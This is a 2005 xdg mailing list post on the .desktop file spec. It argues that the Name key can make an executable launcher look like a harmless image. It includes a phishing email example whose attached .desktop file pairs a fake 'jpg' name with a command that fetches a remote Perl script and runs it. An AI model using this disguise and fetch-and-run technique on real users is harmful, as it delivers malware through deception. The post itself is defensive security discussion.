"Name" key value in desk. entry spec collides with file names, could misguide users?

Diego Calleja diegocg at teleline.es
Sun Mar 13 17:50:34 EET 2005 

El Sun, 13 Mar 2005 09:00:26 +0200,
Kalle Vahlman <kalle.vahlman at gmail.com> escribió:

> >    Bug: He'll get a warning because he's trying to overwrite "foo.desktop" with
> > "foo.desktop". User was just seeing "foo" and "bar". He'll never know that "foo"
> > and "bar" had the same name and he won't know how to drag panek's foo.desktop
> > reliably.
> 
> This is annoying when encountered, true, but how often would a user
> see this? The "user way" of creating .desktops is through some UI,
> which at least on GNOME creates a random name for it. The application
> provided .desktops could have this problem, but why would you have two
> of them in the same place (and not want to overwrite)?

I don't know other people, I don't use gnome "methods for creating a new .desktop file"
I just drag/drop from the menu. I expect users to do the same, and I bet there're people
hitting this. I hit it by using gnome for 30 minutes, it's not a "theorical problem"


> > Problem 2: What user executes is not what he sees
> >    How to reproduce:
> >    Step 1) Create a whatever.desktop file
> >    Step 2) Set Name="Natalie Portman Nude.jpg"
> >    Step 3) Set Run=evil-executable
> > 
> >    Bug: This is a well-learnt lesson from "another OS", where user thinks he's
> > opening a image and he's running a evil program, I don't think it needs more
> > explanations.
> 
> So this is somehow different from the situation that I decide to name
> my newest malware executable as "Natalie Portman Nude.jpg" and users
> click on it trying to view it with the default viewer?

Viewer will try to open it and will fail.

> The problem is not new, and is not fixed by removing the most useful
> feature of the whole spec (human readable and translatable names for
> programs).

It's certainly useful. It solves one problem in a nice way - and then it creates more. I agree
that using other methods would be much more difficult, but I don't think it's worth
of it to risk users' desktops because of developers laziness (not a insult, a programmer
should be always lazy, shouldn't he? ;)

Quoting from: http://primates.ximian.com/~miguel/archive/2004/Sep-09.html
"Security: [...] Certain things in the Gnome world have been hard explicitly to avoid
problems of this nature (the never-shipped and luckily-defunct executable-mime-type
handler is one example)"

.desktop brings to use the problem again - .desktop files are itself a "executable mime
type handler". They're "exectuable" as long as they've a "Exec" key. The difference here
is that it's even *more* easy to hide them. Example:

mail from: maria at hotmail.com
to: me at localhost
subject: What do you think of my new bikini?
Body: Hi diegocg! I bought a new bikini and I took some photos of it! To see
them, save the attached file in your desktop and double-click it!

attached file: save.to.your.desktop
Name=Bikini zoomed.jpg
Run=wget http://www.foo.com/evilperlscript; perl evilperlscript

Now imagine that the message has been generated from maria's computer by
evilscript and that it sent itself to all her contacts (her contacts trust her)

The .desktop file above *works* (i've tried it), and it's scary. This is a can worm
that has already been opened and I don't think we want to bring it to linux.

It's *exactly* what window viruses do: autosend themselves attaching a hotgirl.jpg.pif
file. People looks at hotmail (let's forget outlook), downloads the file, and tries to
open it. Boom. 

You claim that:
> The only way to Be Sure (tm) currently is to only use
> software/anything from a trusted source.

And I think that this assumption is broken. ActiveX designers though the same, "hey,
this is not dangerous, users will decide if they trust unsigned activex controls or not".
Mail addresses can be spoofed to, and that's not going to change tomorrow either.

The first problem it's not so important. The second one it is, I think that it's a
security issue. I'm supossed to work with computers, so if in the future linux holds
an important desktop share I don't want to spend my work hours running
GNUspywaredetector. IMHO, the whole desktop file specification needs to be
rethough: symbolic links, posix attributes...?

As temporary - not definitive -  measure, the desktop specification should be changed
to require as part of the implementation a optional method to disable the Name and
Run funcionality, and require that a "Run" key is just a executable in your system. Being 
able to append several commands in a single "Run" key is too dangerous, and it's
too scary that it works.

More information about the xdg mailing list